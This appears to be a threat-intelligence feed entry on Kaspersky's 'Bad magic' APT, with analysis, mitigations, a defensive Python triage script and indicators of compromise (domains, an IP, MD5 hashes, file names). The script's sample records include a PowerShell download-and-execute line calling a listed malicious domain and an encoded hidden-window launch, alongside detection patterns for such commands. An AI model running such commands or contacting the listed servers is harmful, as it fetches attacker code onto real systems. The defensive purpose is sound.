
OSINT - Bad magic: new APT found in the area of Russo-Ukrainian conflict

Severity: Low
Published: Wed Mar 22 2023 (03/22/2023, 00:00:00 UTC)
Source: CIRCL


AI-Powered Analysis

Last updated: 07/09/2025, 00:24:58 UTC

Technical Analysis

The event records an APT campaign that Kaspersky named 'Bad magic' and that CIRCL republished as OSINT on 22 March 2023; the Securelist write-up linked below is the primary source. According to the quoted excerpt, the activity was found in October 2022 as an active infection of government, agriculture and transportation organizations in the Donetsk, Lugansk and Crimea regions. The initial vector is unconfirmed, but the next stage points to spear phishing or a similar method: victims were led to a URL serving a ZIP archive from a malicious web server. The indicators on this page sketch the rest of the chain. Lure archives and an MSI package (attachment.msi) are listed alongside a PowerMagic dropper (service_pack.dat), a VBScript PowerMagic loader (manutil.vbs) and the PowerMagic backdoor itself, which is a PowerShell implant (hence the ATT&CK tag T1059.001, PowerShell); a separate CommonMagic loader and cryptography module (All.exe, Clean.exe) are also present, and two domains plus one IP address are labelled as distribution servers. No exploited vulnerability or affected product version is given: the chain depends on a user opening the lure, after which the scripting hosts and PowerShell already present on the endpoint do the work, a living-off-the-land approach that keeps the malicious footprint inside signed, ubiquitous interpreters. That is also why the indicators matter more than any patch: the hashes, file names and servers listed below are what a defender can act on directly, while PowerShell telemetry is the main detection surface for rebuilt variants whose hashes differ. The source rates the event at MISP threat level 3 (low) with analysis status 'ongoing' (1).

Potential Impact

The observed victims, per the excerpt, were government, agriculture and transportation organizations in the Donetsk, Lugansk and Crimea regions, so the direct footprint is regional. For European organizations the exposure is indirect but worth planning for: bodies with ties to Ukraine, including government, defence, critical infrastructure, diplomatic and humanitarian entities, match the actor's apparent espionage interest, and the delivery method (an archive fetched from a web server, followed by an MSI package and scripts) works against any user who opens an attachment. A PowerShell backdoor such as PowerMagic gives the operator command execution, data collection and exfiltration, and a foothold for lateral movement; because it runs inside a trusted interpreter, an intrusion can persist for months without triggering signature-based controls, which makes loss of confidentiality the primary impact, with integrity and availability at risk if the access is later used for disruption. The source's low rating reflects the limited observed scope, not the actor's capability: targeting may widen, and a compromised partner or supplier in the region could put European organizations within reach.

Mitigation Recommendations

Start with the indicators on this page. Block or sink-hole webservice-srv.online, webservice-srv1.online and 185.166.217.184 at DNS and proxy, and search proxy and DNS history for past contact. Search EDR and file inventories for the listed MD5 hashes and for the file names (attachment.msi, manutil.vbs, service_pack.dat, Overall.exe, Clean.exe, All.exe), treating a name match alone as a lead and a hash match as confirmation; MD5 values change with any rebuild, so do not rely on them for ongoing detection. For durable coverage, enable PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and Module Logging (Event ID 4103) via Group Policy, forward both to the SIEM, and hunt for encoded commands, download cradles, hidden windows and execution-policy bypasses. Enforce application control with AppLocker or Windows Defender Application Control so that unsigned scripts and MSI packages in user-writable paths do not run, put PowerShell into Constrained Language Mode for standard users, and restrict wscript.exe and cscript.exe where VBScript is not needed, since the listed loader is a .vbs file. Strip or quarantine archive attachments that contain scripts or MSI files at the mail gateway, and segment networks with strict access controls to limit lateral movement. Tune EDR for living-off-the-land behaviour rather than file hashes, run regular hunts on PowerShell command patterns and unusual outbound connections, and share findings with the national cybersecurity centre or CSIRT. Spear-phishing awareness training for staff, tested backups and an incident response plan that covers long-dwell espionage intrusions round out the preparation.
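The logging and hunting steps above come down to matching telemetry against the indicators on this page and against generic PowerShell abuse patterns. The following is an added example (not code from Kaspersky, CIRCL or this feed) that shows such a triage in Python over constructed records: a few Script Block Logging (Event ID 4104) texts, DNS/proxy destinations and file observations. The IOC values are copied from the indicator list further down; the hostnames ws-04xx, the log records, the heuristic regexes and the severity ranking are assumptions of the example.

```python
"""Offline triage of PowerShell Script Block texts (Event ID 4104), DNS/proxy
destinations and file observations against the 'Bad magic' indicators on this
page, plus generic PowerShell living-off-the-land heuristics. Added example:
IOC values are the page's; every log record and hostname is constructed."""
import re
from collections import namedtuple
from typing import List, Optional

# Indicators copied from the page's IOC list (hashes are 32-hex MD5).
IOC_DOMAINS = {"webservice-srv.online", "webservice-srv1.online"}
IOC_IPS = {"185.166.217.184"}
IOC_HASHES = {h: "Lure archives" for h in (
    "0a95a985e6be0918fdb4bfabf0847b5a", "ecb7af5771f4fe36a3065dc4d5516d84",
    "765f45198cb8039079a28289eab761c5", "ebaf3c6818bfc619ca2876abd6979f6d",
    "1032986517836a8b1f87db954722a33f", "1de44e8da621cdeb62825d367693c75e")}
IOC_HASHES.update({
    "9e19fe5c3cf3e81f347dd78cf3c2e0c2": "CommonMagic cryptography module",
    "ce8d77af445e3a7c7e56a6ea53af8c0d": "CommonMagic loader",
    "1fe3a2502e330432f3cf37ca7acbffac": "PowerMagic backdoor",
    "8c2f5e7432f1e6ad22002991772d589b": "PowerMagic loader",
    "bec44b3194c78f6e858b1768c071c5db": "PowerMagic dropper",
    "7c0e5627fd25c40374bc22035d3fadd8": "(no description on the page)",
    "fee3db5db8817e82b1af4cedafd2f346": "(no description on the page)",
})
IOC_FILENAMES = {"overall.exe", "clean.exe", "all.exe",
                 "manutil.vbs", "service_pack.dat", "attachment.msi"}

# Generic living-off-the-land PowerShell heuristics (assumed, not actor-specific).
LOLBIN_PATTERNS = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b|-noni\b|-noninteractive\b|-(?:ep|executionpolicy)\s+bypass", re.I),
    "persistence": re.compile(r"schtasks|Register-ScheduledTask|CurrentVersion\\Run", re.I),
    "script_host": re.compile(r"\b(?:wscript|cscript|msiexec)(?:\.exe)?\b", re.I),
}

Hit = namedtuple("Hit", "src reasons severity")  # host, why flagged, ranking

def scan_powershell(text: str) -> List[str]:
    """Heuristic names matching one 4104 script-block text."""
    return [name for name, rx in LOLBIN_PATTERNS.items() if rx.search(text)]

def embedded_iocs(text: str) -> List[str]:
    """Page IOCs appearing inside a command line or script body."""
    low = text.lower()
    found = ["ioc_domain:" + d for d in sorted(IOC_DOMAINS) if d in low]
    found += ["ioc_ip:" + ip for ip in sorted(IOC_IPS) if ip in low]
    # Name matches need boundaries so 'all.exe' does not fire on 'install.exe'.
    found += ["ioc_filename:" + f for f in sorted(IOC_FILENAMES)
              if re.search(r"(?<![\w.])" + re.escape(f) + r"(?!\w)", low)]
    return found

def scan_network(dst: str) -> Optional[str]:
    """'ioc_ip' / 'ioc_domain' when a destination is a listed distribution server."""
    h = dst.lower().rstrip(".")
    if h in IOC_IPS:
        return "ioc_ip"
    if h in IOC_DOMAINS or any(h.endswith("." + d) for d in IOC_DOMAINS):
        return "ioc_domain"
    return None

def scan_file(path: str, md5: Optional[str] = None) -> List[str]:
    """Hash match is confirmation; a bare file-name match is only a lead."""
    found = ["ioc_hash:" + IOC_HASHES[md5.lower()]] if md5 and md5.lower() in IOC_HASHES else []
    base = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return found + (["ioc_filename:" + base] if base in IOC_FILENAMES else [])

def severity(reasons: List[str]) -> str:
    """Hard IOC beats stacked heuristics, which beat a single weak lead."""
    if any(r.startswith(("ioc_hash", "ioc_domain", "ioc_ip")) for r in reasons):
        return "high"
    heur = [r for r in reasons if r in LOLBIN_PATTERNS]
    return "medium" if len(heur) >= 2 or "encoded_command" in heur else "low"

def triage(records) -> List[Hit]:
    """One Hit per record with at least one reason; quiet records are dropped."""
    hits = []
    for r in records:
        if r["type"] == "ps":
            reasons = scan_powershell(r["text"]) + embedded_iocs(r["text"])
        elif r["type"] == "net":
            reasons = [t for t in [scan_network(r["dst"])] if t]
        else:
            reasons = scan_file(r["path"], r.get("md5"))
        if reasons:
            hits.append(Hit(r["src"], tuple(reasons), severity(reasons)))
    return hits

# Constructed records: two benign, the rest modelled on the page's chain.
SAMPLE_RECORDS = [
    {"type": "ps", "src": "ws-0412", "text": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"type": "ps", "src": "ws-0412", "text": "powershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"type": "ps", "src": "ws-0418", "text": "$c=New-Object Net.WebClient; IEX $c.DownloadString('http://webservice-srv.online/service_pack.dat')"},
    {"type": "net", "src": "ws-0418", "dst": "webservice-srv1.online"},
    {"type": "net", "src": "ws-0420", "dst": "updates.example.com"},
    {"type": "net", "src": "ws-0418", "dst": "185.166.217.184"},
    {"type": "file", "src": "ws-0418", "path": "C:\\Users\\alice\\AppData\\Local\\Temp\\manutil.vbs", "md5": "8c2f5e7432f1e6ad22002991772d589b"},
    {"type": "file", "src": "ws-0420", "path": "C:\\Program Files\\Vendor\\All.exe", "md5": "00000000000000000000000000000000"},
]
```

Running triage(SAMPLE_RECORDS) yields six hits: the encoded, hidden-window launch on ws-0412 ranks medium on heuristics alone; the download cradle on ws-0418 ranks high because the page's domain and dropper name appear in the script text; the two server contacts and the manutil.vbs hash match rank high; and the lone All.exe name match on ws-0420 ranks low, since a generic file name without the hash is only a lead. Feed real 4104 ScriptBlockText fields, DNS/proxy destination columns and file-hash inventory rows in the same record shape to reuse it.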


Technical Details

Threat Level: 3 (MISP scale: low)
Analysis: 1 (MISP status: ongoing)
UUID: f3eda2d3-840b-46ba-ac74-50b68a58b0fe
Original Timestamp: 1679481690 (2023-03-22 10:41:30 UTC)

Indicators of Compromise

Domain

Value                     Description
webservice-srv.online     Distribution servers
webservice-srv1.online    Distribution servers

Ip

Value                     Description
185.166.217.184           Distribution servers

Hash

Value (MD5)                           Description
0a95a985e6be0918fdb4bfabf0847b5a      Lure archives
ecb7af5771f4fe36a3065dc4d5516d84      Lure archives
765f45198cb8039079a28289eab761c5      Lure archives
ebaf3c6818bfc619ca2876abd6979f6d      Lure archives
1032986517836a8b1f87db954722a33f      Lure archives
1de44e8da621cdeb62825d367693c75e      Lure archives
7c0e5627fd25c40374bc22035d3fadd8      (no description)
9e19fe5c3cf3e81f347dd78cf3c2e0c2      CommonMagic cryptography module
ce8d77af445e3a7c7e56a6ea53af8c0d      CommonMagic loader
1fe3a2502e330432f3cf37ca7acbffac      PowerMagic backdoor
8c2f5e7432f1e6ad22002991772d589b      PowerMagic loader
bec44b3194c78f6e858b1768c071c5db      PowerMagic dropper
fee3db5db8817e82b1af4cedafd2f346      (no description)

File

Value                     Description
Overall.exe               (no description)
Clean.exe                 CommonMagic cryptography module
All.exe                   CommonMagic loader
manutil.vbs               PowerMagic loader
service_pack.dat          PowerMagic dropper
attachment.msi            (no description)

Link

Value
https://securelist.com/bad-magic-apt/109087/

Text

Value
Since the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions. In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.

Threat ID: 682acdbebbaf20d303f0e64a

Added to database: 5/19/2025, 6:20:46 AM

Last enriched: 7/9/2025, 12:24:58 AM

Last updated: 8/18/2025, 10:09:00 PM
